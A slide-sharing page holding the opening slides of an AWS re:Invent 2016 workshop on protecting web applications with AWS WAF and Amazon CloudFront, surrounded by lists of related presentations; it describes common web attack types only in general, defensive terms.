AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFrontAWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFront
AWS 201 - A Walk through the AWS Cloud: Introduction to Amazon CloudFront
 
Analyzing data, Optimizing Service Experience for Retailers
Analyzing data, Optimizing Service Experience for Retailers Analyzing data, Optimizing Service Experience for Retailers
Analyzing data, Optimizing Service Experience for Retailers
 
How Mature is Your Infrastructure?
How Mature is Your Infrastructure?How Mature is Your Infrastructure?
How Mature is Your Infrastructure?
 
Getting the Most Out of Your NoSQL DB
Getting the Most Out of Your NoSQL DBGetting the Most Out of Your NoSQL DB
Getting the Most Out of Your NoSQL DB
 
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...
AWS re:Invent 2016: How to move 1,000 VMs and Biz Critical Apps to AWS in 6 m...
 
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
Auto-Scaling Web Application Security in Amazon Web Services (SEC308) | AWS r...
 
Deep Dive: Infrastructure as Code
Deep Dive: Infrastructure as CodeDeep Dive: Infrastructure as Code
Deep Dive: Infrastructure as Code
 
Introduction to Amazon CloudFront - Pop-up Loft Tel Aviv
Introduction to Amazon CloudFront - Pop-up Loft Tel AvivIntroduction to Amazon CloudFront - Pop-up Loft Tel Aviv
Introduction to Amazon CloudFront - Pop-up Loft Tel Aviv
 

Similar to AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

AWS WAF introduction and live demo - Pop-up Loft Tel Aviv
AWS WAF introduction and live demo - Pop-up Loft Tel AvivAWS WAF introduction and live demo - Pop-up Loft Tel Aviv
AWS WAF introduction and live demo - Pop-up Loft Tel AvivAmazon Web Services
 
Introduction to AWS WAF and AWS Firewall Manager
Introduction to AWS WAF and AWS Firewall ManagerIntroduction to AWS WAF and AWS Firewall Manager
Introduction to AWS WAF and AWS Firewall ManagerAkesh Patil
 
Web Security Automation: Spend Less Time Securing your Applications
 	  Web Security Automation: Spend Less Time Securing your Applications 	  Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your ApplicationsAmazon Web Services
 
Aws meetup aws_waf
Aws meetup aws_wafAws meetup aws_waf
Aws meetup aws_wafAdam Book
 
Running Hybrid Cloud Patterns on AWS
Running Hybrid Cloud Patterns on AWSRunning Hybrid Cloud Patterns on AWS
Running Hybrid Cloud Patterns on AWSShiva Narayanaswamy
 
Secure your critical workload on AWS
Secure your critical workload on AWSSecure your critical workload on AWS
Secure your critical workload on AWSAmazon Web Services
 
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptx
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptxTrack 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptx
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptxAmazon Web Services
 
AWS Security for Financial Services
AWS Security for Financial ServicesAWS Security for Financial Services
AWS Security for Financial ServicesAmazon Web Services
 
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017Amazon Web Services
 
Modern Security and Compliance Through Automation
Modern Security and Compliance Through AutomationModern Security and Compliance Through Automation
Modern Security and Compliance Through AutomationAmazon Web Services
 
AWS August Webinar Series - DDoS Resiliency
AWS August Webinar Series - DDoS ResiliencyAWS August Webinar Series - DDoS Resiliency
AWS August Webinar Series - DDoS ResiliencyAmazon Web Services
 
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...Amazon Web Services
 
Being Well Architected in the Cloud
Being Well Architected in the CloudBeing Well Architected in the Cloud
Being Well Architected in the CloudAdrian Hornsby
 
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery Don’t Sacrifice Performance for Security: Best Practices for Content Delivery
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery Amazon Web Services
 
網路安全自動化 - 縮短應用維安的作業時間
網路安全自動化 - 縮短應用維安的作業時間網路安全自動化 - 縮短應用維安的作業時間
網路安全自動化 - 縮短應用維安的作業時間Amazon Web Services
 
re:Invent recap session 2: Being well Architected in the cloud
re:Invent recap session 2: Being well Architected in the cloudre:Invent recap session 2: Being well Architected in the cloud
re:Invent recap session 2: Being well Architected in the cloudAmazon Web Services
 
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsNET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsAmazon Web Services
 
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsNET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsAmazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at ScaleAmazon Web Services
 
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...Amazon Web Services
 

Similar to AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202) (20)

AWS WAF introduction and live demo - Pop-up Loft Tel Aviv
AWS WAF introduction and live demo - Pop-up Loft Tel AvivAWS WAF introduction and live demo - Pop-up Loft Tel Aviv
AWS WAF introduction and live demo - Pop-up Loft Tel Aviv
 
Introduction to AWS WAF and AWS Firewall Manager
Introduction to AWS WAF and AWS Firewall ManagerIntroduction to AWS WAF and AWS Firewall Manager
Introduction to AWS WAF and AWS Firewall Manager
 
Web Security Automation: Spend Less Time Securing your Applications
 	  Web Security Automation: Spend Less Time Securing your Applications 	  Web Security Automation: Spend Less Time Securing your Applications
Web Security Automation: Spend Less Time Securing your Applications
 
Aws meetup aws_waf
Aws meetup aws_wafAws meetup aws_waf
Aws meetup aws_waf
 
Running Hybrid Cloud Patterns on AWS
Running Hybrid Cloud Patterns on AWSRunning Hybrid Cloud Patterns on AWS
Running Hybrid Cloud Patterns on AWS
 
Secure your critical workload on AWS
Secure your critical workload on AWSSecure your critical workload on AWS
Secure your critical workload on AWS
 
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptx
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptxTrack 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptx
Track 5 Session 3_ 迎戰DDoS攻擊的資安最佳實踐.pptx
 
AWS Security for Financial Services
AWS Security for Financial ServicesAWS Security for Financial Services
AWS Security for Financial Services
 
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017
Fundamentals of Networking and Security on AWS - AWS Summit Tel Aviv 2017
 
Modern Security and Compliance Through Automation
Modern Security and Compliance Through AutomationModern Security and Compliance Through Automation
Modern Security and Compliance Through Automation
 
AWS August Webinar Series - DDoS Resiliency
AWS August Webinar Series - DDoS ResiliencyAWS August Webinar Series - DDoS Resiliency
AWS August Webinar Series - DDoS Resiliency
 
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...
Orchestrate Perimeter Security Across Distributed Applications (SEC326) - AWS...
 
Being Well Architected in the Cloud
Being Well Architected in the CloudBeing Well Architected in the Cloud
Being Well Architected in the Cloud
 
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery Don’t Sacrifice Performance for Security: Best Practices for Content Delivery
Don’t Sacrifice Performance for Security: Best Practices for Content Delivery
 
網路安全自動化 - 縮短應用維安的作業時間
網路安全自動化 - 縮短應用維安的作業時間網路安全自動化 - 縮短應用維安的作業時間
網路安全自動化 - 縮短應用維安的作業時間
 
re:Invent recap session 2: Being well Architected in the cloud
re:Invent recap session 2: Being well Architected in the cloudre:Invent recap session 2: Being well Architected in the cloud
re:Invent recap session 2: Being well Architected in the cloud
 
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsNET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
 
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security AnalyticsNET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
NET203_Using Amazon VPC Flow Logs to Do Predictive Security Analytics
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at Scale
 
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...
AWS re:Invent 2016: Enabling Enterprise Migrations: Creating an AWS Landing Z...
 

More from Amazon Web Services

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Amazon Web Services
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Amazon Web Services
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateAmazon Web Services
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSAmazon Web Services
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Amazon Web Services
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Amazon Web Services
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...Amazon Web Services
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsAmazon Web Services
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareAmazon Web Services
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSAmazon Web Services
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAmazon Web Services
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareAmazon Web Services
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWSAmazon Web Services
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckAmazon Web Services
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without serversAmazon Web Services
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...Amazon Web Services
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceAmazon Web Services
 

More from Amazon Web Services (20)

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS Fargate
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWS
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot
 
Open banking as a service
Open banking as a serviceOpen banking as a service
Open banking as a service
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
 
Computer Vision con AWS
Computer Vision con AWSComputer Vision con AWS
Computer Vision con AWS
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatare
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e web
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWS
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch Deck
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without servers
 
Fundraising Essentials
Fundraising EssentialsFundraising Essentials
Fundraising Essentials
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container Service
 

Recently uploaded

Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Recently uploaded (20)

Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

AWS re:Invent 2016: Workshop: Secure Your Web Application with AWS WAF and Amazon CloudFront (SAC202)

  • 1. © 2016, Amazon Web Services, Inc. or its Affiliates. All rights reserved. Vlad Vlasceanu, Heitor Vital, Chris Colthurst November 29, 2016 Secure Your Web Application with AWS WAF and Amazon CloudFront SAC202 - Workshop
  • 2. The workshop team is here to help! Chris Colthurst Sean Greathouse Assaf Namer Heitor Vital Vlad Vlasceanu Christian Williams
  • 3. What to expect from the workshop • Each table expected to work as a team – find your number table • Content is broken up into 3 chapters: • Introduction and baseline protection • Security automation • Advanced rules and additional security controls • Team tasks: • Start with a baseline sample website (provided) • 3 tasks: implement the controls discussed in each chapter • Handout: • Contains additional guidance for each task • Find and implement the optimal solution!
  • 4. A story of courage, friendship … and WAF
  • 5. Prelude Your friend Bob knows that you’re great with computers and asks you to set up a website for him…
  • 6. Setup workshop environment Follow the steps in the Prelude section of your handout to launch the AWS CloudFormation template: Checkpoint: What is AWS CloudFormation? Download the CloudFormation template from: https://s3-us-west-2.amazonaws.com/sac202-waf/sac202-cloudformation.json Launch a CloudFormation stack using the downloaded template Detailed steps are available in your handout document 1 3 Open the AWS Management Console for your account and go to CloudFormation Select the Oregon, N. Virginia or Ireland AWS regions in the top right corner 2
  • 7. Chapter 1: Baseline website and web application protection
  • 8. What is a web application firewall? • Web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to HTTP traffic • WAFs come in four flavors • Pure play: Standalone appliance or software • CDN: bundled with content delivery network • Load balancer: bundled with a load balancer • Universal threat manager (UTM): catch-all for misc. security
  • 9. Why use a WAF? Application vulnerabilities: Good users Bad folks Web server Database Exploit code Your application
  • 10. Why use a WAF? Abuse detection and prevention: Good users Bad folks Web server Database Your applicationData leaks
  • 11. Why use a WAF? Distributed denial of service (DDOS) attacks: Good users Bad folks Web server Database Your application
  • 12. AWS WAF Why use a WAF? AWS WAF  block the bad folks and allow the good users: Good users Bad folks Web server Database Your application
  • 13. Why use a WAF? • WAFs help protect websites and applications against attacks that cause data breaches and downtime • General WAF use cases • Protect from SQL injection (SQLi) and cross-site scripting (XSS) • Prevent website scraping, crawlers, and BOTs • Mitigate DDOS (HTTP/HTTPS floods) • Gartner reports that main driver of WAF purchases (25- 30%) is PCI compliance
  • 14. What about DDOS? DDOS Targeted attacks WAF Reflection and amplification Layer 4 and 7 floods Slowloris SSL abuse HTTP floods SQL injection Bots and probes Application exploits Social engineering Reverse engineering
  • 15. Attack vectors addressed by AWS WAF • SQL injection: Attackers insert malicious SQL code into web requests in an effort to extract data from your database • Cross-site scripting (XSS): Malicious scripts are injected into otherwise benign and trusted websites • Scanners and probes: Malicious sources scan and probe Internet-facing web applications for vulnerabilities • Known attacker origins (IP reputation lists): A number of organizations maintain reputation lists of IP addresses of known attackers • Bots and scrapers: Some automated clients misrepresent themselves to bypass restrictions • Application-level exploits
  • 16. Amazon CloudFront + AWS WAF Amazon CloudFront • 68 points of presence around the world • Improves performance by caching static content and optimizing connections for dynamic content • Disperses traffic across global edge locations • DDOS attacks (such as HTTP floods) are absorbed close to the source
